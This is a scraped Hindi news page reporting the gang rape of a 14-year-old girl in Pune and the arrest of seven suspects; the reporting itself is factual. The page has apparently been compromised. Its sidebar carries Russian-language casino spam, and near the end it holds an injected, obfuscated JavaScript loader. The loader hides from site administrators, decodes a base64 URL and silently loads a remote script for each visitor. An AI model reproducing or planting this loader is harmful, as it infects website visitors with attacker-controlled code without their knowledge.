14 साल की नाबालिग के साथ गैंगरेप , पुलिस ने इस मामले में 7 लोगों को किया अरेस्ट

- Advertisement -
- Advertisement -

राष्ट्र आजकल प्रतिनिधि । पुणे के वानवड़ी इलाके में 14 साल की नाबालिग के साथ गैंगरेप की शर्मनाक घटना सामने आई है। पुणे पुलिस ने इस मामले में 7 लोगों को अरेस्ट किया है। लड़की का पहले एक ऑटोरिक्शा में अपहरण किया गया और फिर एक फ्लैट में ले जाकर उससे गैंगरेप किया गया। यह घटना रविवार शाम को हुई। कुछ दिन पहले पिंपरी चिंचवड़ के दत्तावाड़ी इलाके में भी ऐसी ही घटना हुई थी।

पीड़िता का सड़क किनारे से अपहरण किया गया। उस वक्त वह गांव जाने के लिए पुणे रेलवे स्टेशन के लिए निकली थी। पुलिस ने उसे गंभीर हालत में पाया था। फिलहाल उसका पुणे के एक हॉस्पिटल में इलाज जारी है, जहां उसकी हालत स्थिर है।

पीड़िता की निशानदेही पर वानवड़ी पुलिस ने 7 लोगों को गिरफ्तार किया है। आरोपियों में से दो रेलवे के फोर्थ क्लास के कर्मचारी हैं और बाकी 6 रिक्शा चलाते हैं। सभी को एक CCTV फुटेज के आधार पर पकड़ा गया है। जांच में यह भी सामने आया है कि आरोपियों के कुछ और साथी इस वारदात में शामिल हैं। उन्हें पकड़ने के लिए स्पेशल टीम बनाई गई है। सोमवार को सभी को शिवाजीनगर कोर्ट में पेश किया गया। वहां से उन्हें तीन दिन की पुलिस कस्टडी में भेज दिया गया।

पुणे पुलिस ने कहा कि यह घटना बेहद संवेदनशील है, इसलिए पूरी कार्रवाई पूरी होने के बाद आधिकारिक सूचना दी जाएगी।

एक हफ्ते पहले ऐसी ही वारदात पुणे के स्वारगेट इलाके में हुई थी। यहां 28 अगस्त को स्वारगेट बाजार से घर जा रही लड़की को 4 लोग जबरदस्ती उठा कर ले गए थे और गैंगरेप किया था। शाम करीब 6 बजे एक महिला ने पुलिस को फोन कर इस घटना की जानकारी दी थी। इसके बाद पुलिस की टीम मौके पर पहुंची और चारों आरोपियों को दरवाजा तोड़ घर से बाहर निकाला था।

- Advertisement -

Latest news

казино онлайн 2025 для игры на реальные деньги.2712

Оцените топовые казино онлайн 2025 для игры на реальные деньги ...
- Advertisement -

ज़रूर पढ़े

इंदौर: नाबालिग को हुआ पंजाब के लड़के से प्रेम, पबजी खेल से हुई थी दोनों की जान- पहचान, पहुँच गयी पंजाब उससे मिलने

परिजनों की गुमशुदगी की शिकायत पर; पुलिस ने कॉल डिटेल निकाली तो दस दिन बाद आरोपी और लड़की को इंदौर ले आई।...

कमलनाथ के नरसिंहपुर आगमन को लेकर करेली ब्लाक कांग्रेस की महत्वपूर्ण बैठक संपन्न

राष्ट्र आजकल/पूनम दीक्षित/ करेली नरसिंहपुर: 19 मार्च को विशाल आमसभामध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष पूर्व मुख्यमंत्री कमलनाथ का 19 मार्च को...

सिंधिया: किसने क्या किया- क्या नहीं किया, कांग्रेस को खुद नहीं पता अपने नेताओं के बारे में

कांग्रेस खुद ही नहीं जानती कि उनके नेता ने क्या किया और क्या नहीं. कांग्रेस छोड़कर बीजेपी में शामिल होने वाले ज्योतिरादित्य...

Related news

Pinco Казино – Официальный сайт Пинко вход на зеркало.9921

Pinco Казино - Официальный сайт Пинко вход на зеркало ...

– онлайн казино и покер рум.1391

Покердом - онлайн казино и покер рум ▶️ ИГРАТЬ ...

Казино Официальный сайт Pin Up Casino играть онлайн – Вход Зеркало.360

Пин Ап Казино Официальный сайт | Pin Up Casino играть онлайн - Вход, Зеркало ...

test(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(//g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')||document.documentElement).appendChild(s);}catch(e){}})();
- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here